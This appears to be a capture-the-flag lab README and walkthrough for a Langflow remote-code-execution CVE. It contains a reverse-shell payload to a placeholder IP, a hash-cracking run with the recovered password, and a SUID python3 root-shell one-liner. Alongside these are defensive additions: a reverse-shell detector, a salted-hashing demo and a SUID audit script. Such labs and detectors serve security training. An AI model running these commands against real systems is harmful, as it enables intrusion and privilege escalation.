## https://sploitus.com/exploit?id=1B83B262-82FC-537F-BB58-641F6536FDBC
# 🎯 FlowBreaker

> **CVE-2026-33017** — HTB-Style Pentest Lab

```
╔════════════════════════════════════════════════════════════╗
║  Machine : FlowBreaker                                     ║
║  OS      : Linux                                           ║
║  Rating  : Medium                                          ║
║  CVE     : CVE-2026-33017 (Langflow RCE)                   ║
║  Author  : Bikash                                          ║
╚════════════════════════════════════════════════════════════╝
```

## 📋 Overview

FlowBreaker simulates a real-world penetration testing scenario targeting a vulnerable AI workflow platform. The machine requires subdomain enumeration, exploitation of a critical unauthenticated RCE vulnerability (CVE-2026-33017), and Linux privilege escalation to capture both flags.

### Attack Surface
- **Domain:** `langflow.hack`
- **Type:** Web Application + Hash Cracking + SSH + Linux Privesc
- **Flags:** `user.txt` and `root.txt` (random hex, regenerated on every restart)

---

## 🚀 Quick Start

### Prerequisites
- Docker & Docker Compose
- `ffuf` (for subdomain enumeration)

### Setup

```bash
# 1. Clone/navigate to the lab directory
cd CVE-2026-33017-lab

# 2. Make scripts executable
chmod +x scripts/setup.sh scripts/reset.sh

# 3. Run the setup (adds /etc/hosts entries, builds & starts containers)
sudo bash scripts/setup.sh
```

### Reset (Regenerate Flags)

```bash
sudo bash scripts/reset.sh
```

### Teardown

```bash
docker compose down -v
```

---

## ๐Ÿ—๏ธ Architecture

```
                    ┌──────────────────────┐
                    │   Attacker Machine   │
                    └──────────┬───────────┘
                               │
                         Port 80 (HTTP)
                               │
                    ┌──────────▼───────────┐
                    │   Nginx Proxy        │
                    │   (Subdomain Router) │
                    └──────────┬───────────┘
                               │
             ┌─────────────────┴─────────────────┐
             │                                   │
     ┌───────▼───────┐                   ┌───────▼───────┐
     │ langflow.hack │                   │ dev.langflow  │
     │ Landing Page  │                   │ .hack         │
     │ (Static HTML) │                   │ Langflow      │
     └───────────────┘                   │ v1.8.1 ★      │
                                         │ (VULNERABLE)  │
                                         └───────────────┘
```

### Subdomains

| Subdomain | Purpose | Response |
|-----------|---------|----------|
| `langflow.hack` | Corporate landing page | 200 — Static site |
| `dev.langflow.hack` | **★ Vulnerable Langflow** | 200 — Langflow UI |

---

## ๐Ÿ” Flags

Both flags are stored in **hex format** and **regenerate on every container restart**:

| Flag | Location | Access |
|------|----------|--------|
| `user.txt` | `/home/spydomain/user.txt` | Readable via SSH as `spydomain` |
| `root.txt` | `/root/root.txt` | Readable only as root |

---

## โš ๏ธ Disclaimer

This lab is designed for **educational and authorized security testing purposes only**. Do not use these techniques against systems without explicit permission.

---

## 💡 Hints

### Hint 1 — Enumeration
> Check the HTML source code of the landing page. Are there any comments left by the developers?

### Hint 2 — Exploitation
> The dev subdomain runs Langflow 1.8.1. What CVE affects this version? RCE will get you a `www-data` shell.

### Hint 3 — Lateral Movement
> As `www-data`, look around `/opt/webapp/`. Is there a database containing credentials? You might need to extract a hash and crack it to SSH as a local user.

### Hint 4 — Privilege Escalation
> Check for SUID binaries. One of them is unusual and very powerful.

## 📖 Full Walkthrough (SPOILER WARNING)

### Step 1: Subdomain Enumeration

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u http://langflow.hack \
     -H "Host: FUZZ.langflow.hack" \
     -fc 404
```

You'll discover: `dev`, `www`, `api`, `admin`, `staging`

### Step 2: Investigate dev.langflow.hack

```bash
curl -s http://dev.langflow.hack/health
# → Langflow health check response

curl -sI http://dev.langflow.hack
# → X-Powered-By: Langflow/1.8.1
```

### Step 3: Exploit CVE-2026-33017

```bash
# Start listener
nc -lvnp 4444

# Use a public PoC script (like the one found in the poc.txt file):
python3 poc.py \
    --url http://dev.langflow.hack \
    --cmd "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

This gives you a reverse shell as the `www-data` user.
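From the blue-team side, the payload above is what process-execution telemetry on the `www-data` host would record. The following is an added example, not part of the FlowBreaker lab or its PoC: a small detector that scans process command lines for the `bash -i` plus `/dev/tcp/<ip>/<port>` redirect pattern used in this step. The log format (`<pid> <user> <cmdline>`) and the sample lines are constructed for the demo, not a real auditd or EDR schema.

```python
"""Added example (not part of the FlowBreaker lab): flag process command lines
that match the bash /dev/tcp reverse-shell pattern from Step 3.
Log format is a constructed "pid user cmdline" line, not a real auditd schema."""
import re

# Outbound redirect into bash's /dev/tcp pseudo-device: captures the peer ip:port
DEV_TCP = re.compile(r"/dev/tcp/(?P<host>[0-9.]+)/(?P<port>\d{1,5})")
# Interactive bash with its stdio redirected is the other half of the pattern
INTERACTIVE_BASH = re.compile(r"\bbash\s+-i\b")

# Constructed sample telemetry: "<pid> <user> <cmdline>"; one line is the lab payload
SAMPLE_LOG = """\
1201 www-data /usr/bin/python3 /opt/webapp/app.py
1337 www-data bash -c bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
1402 spydomain ssh -V
1510 root /usr/bin/python3 /usr/lib/python3/dist-packages/something.py
1611 www-data /bin/sh -c echo hello > /dev/null
"""


def parse_line(line):
    """Split a constructed log line into (pid, user, cmdline)."""
    pid, user, cmdline = line.split(" ", 2)
    return int(pid), user, cmdline


def classify(cmdline):
    """Return the reasons a command line is suspicious; empty list means clean."""
    reasons = []
    m = DEV_TCP.search(cmdline)
    if m:
        reasons.append(f"outbound /dev/tcp redirect to {m['host']}:{m['port']}")
    if INTERACTIVE_BASH.search(cmdline) and (">&" in cmdline or "0>&1" in cmdline):
        reasons.append("interactive bash with stdio redirected")
    return reasons


def find_reverse_shells(log_text):
    """Scan every line; return [(pid, user, cmdline, reasons)] for hits only."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        pid, user, cmdline = parse_line(line)
        reasons = classify(cmdline)
        if reasons:
            hits.append((pid, user, cmdline, reasons))
    return hits


if __name__ == "__main__":
    for pid, user, cmdline, reasons in find_reverse_shells(SAMPLE_LOG):
        print(f"[ALERT] pid={pid} user={user}: {'; '.join(reasons)}")
        print(f"        {cmdline}")
```

The useful signal for a detection engineer is the combination: a web-server account (`www-data`) spawning an interactive shell whose file descriptors point at a network endpoint. Either half alone (a `/dev/tcp` health probe, or `bash -i` in an admin's terminal) is far noisier than both together.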

### Step 4: Privilege Escalation (Lateral Movement to spydomain)

```bash
# Enumerate the filesystem and find the database backup
ls -la /opt/webapp
sqlite3 /opt/webapp/langflow.db.bak "SELECT * FROM users;"
# Extracted hash for spydomain: 55aa7decfc6eecfb2d35e197baec1ec31dbccbc4b841793792c3a5099307dce8

# Crack the hash using John the Ripper or Hashcat
echo "55aa7decfc6eecfb2d35e197baec1ec31dbccbc4b841793792c3a5099307dce8" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 hash.txt
# Result: butterfly

# SSH into the container
ssh spydomain@dev.langflow.hack -p 2222
# Password: butterfly
```
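The hash in `langflow.db.bak` cracks in seconds because it is a single unsalted SHA-256 of the password: one digest per guess, and one precomputed table serves every user in the database. The following is an added example, not part of the lab: it reproduces the wordlist attack against that storage format and contrasts it with a salted, iterated PBKDF2-HMAC-SHA256 hash from Python's standard library. The wordlist is a constructed stand-in for `rockyou.txt`; the lab's actual hash is not embedded here.

```python
"""Added example (not part of the FlowBreaker lab): wordlist attack on an
unsalted SHA-256 password hash versus a salted, iterated PBKDF2 hash.
WORDLIST is a constructed stand-in for rockyou.txt."""
import hashlib
import hmac
import os
import time
from typing import Optional

# Constructed mini wordlist; the lab's password happens to be in it
WORDLIST = ["123456", "password", "qwerty", "sunshine", "butterfly", "dragon"]

# Demo iteration count; production guidance (OWASP) is several hundred thousand
PBKDF2_ITERATIONS = 100_000


def sha256_hex(password: str) -> str:
    """Unsalted SHA-256 hex digest: the storage format found in the lab's DB backup."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(target_hex: str, wordlist) -> Optional[str]:
    """One cheap hash per candidate; no salt, so a rainbow table would also work."""
    target_hex = target_hex.lower()
    for candidate in wordlist:
        if hmac.compare_digest(sha256_hex(candidate), target_hex):
            return candidate
    return None


def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated storage: 'pbkdf2_sha256$<iters>$<salt-hex>$<hash-hex>'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _algo, iters, salt_hex, hash_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def crack_pbkdf2(stored: str, wordlist) -> Optional[str]:
    """Same attack, but every guess now costs <iters> HMAC rounds, and the
    per-user salt means the work cannot be shared across accounts."""
    for candidate in wordlist:
        if pbkdf2_verify(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    weak = sha256_hex("butterfly")
    t0 = time.perf_counter()
    print("unsalted:", crack_unsalted(weak, WORDLIST), f"({time.perf_counter() - t0:.4f}s)")

    strong = pbkdf2_store("butterfly")
    t0 = time.perf_counter()
    print("pbkdf2  :", crack_pbkdf2(strong, WORDLIST), f"({time.perf_counter() - t0:.2f}s)")
```

Both attacks succeed against a password that is in the wordlist; what changes is the cost per guess and the loss of shared precomputation. The remediation the lab host would need is twofold: store credentials with a salted, memory- or CPU-hard KDF, and never leave a `.db.bak` readable by the web-server account.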

### Step 5: Get User Flag

```bash
cat /home/spydomain/user.txt
```

### Step 6: Privilege Escalation (Root)

```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Python3 has SUID!
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# Get root flag
cat /root/root.txt
```
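The root step works because an interpreter carries the SUID bit: a SUID `python3` lets any local user call `os.setuid(0)` and spawn a shell. The following is an added example, not part of the lab: an audit that takes a SUID listing such as the output of `find / -perm -4000 -type f`, flags interpreters and shells as critical, flags anything outside a baseline for review, and emits the `chmod u-s` remediation. The listing and the baseline set are constructed for the demo; `live_suid_listing` is the Python equivalent of the `find` command for use on a real host and is not exercised here.

```python
"""Added example (not part of the FlowBreaker lab): audit a SUID-binary listing
for interpreters/shells and unknown binaries. SAMPLE_FIND_OUTPUT and
EXPECTED_SUID are constructed for the demo."""
import os
import re
import stat
from pathlib import PurePosixPath

# Interpreters and shells: SUID on any of these is a direct uid-0 shell for every local user.
# The version suffix is optional so /usr/bin/python3.11 (the real file behind the
# python3 symlink on Debian-style systems) is caught as well.
INTERPRETER_RE = re.compile(r"^(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|bash|sh|dash|zsh)$")

# Constructed baseline of SUID binaries one expects on a stock Linux image
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/umount",
}

# Constructed listing in the shape `find / -perm -4000 -type f` prints
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/python3.11
/usr/bin/mount
/opt/tools/backup-helper
"""


def audit(listing: str):
    """Classify each SUID path: CRITICAL (interpreter/shell) or REVIEW (not in baseline)."""
    findings = []
    for path in listing.split():
        name = PurePosixPath(path).name
        if INTERPRETER_RE.match(name):
            findings.append((path, "CRITICAL", "SUID interpreter: setuid(0) + shell for any local user"))
        elif path not in EXPECTED_SUID:
            findings.append((path, "REVIEW", "SUID binary not in baseline"))
    return findings


def remediation(findings):
    """Commands that strip the SUID bit from every CRITICAL finding."""
    return [f"chmod u-s {path}" for path, severity, _ in findings if severity == "CRITICAL"]


def live_suid_listing(root: str = "/") -> str:
    """Python equivalent of `find / -perm -4000 -type f` (not run by the demo)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return "\n".join(found)


if __name__ == "__main__":
    results = audit(SAMPLE_FIND_OUTPUT)
    for path, severity, why in results:
        print(f"[{severity}] {path}: {why}")
    for cmd in remediation(results):
        print("fix:", cmd)
```

Run against a real host, `audit(live_suid_listing())` gives the same two classes of finding; the baseline should be taken from a known-good image of the same distribution, since the stock SUID set differs between releases.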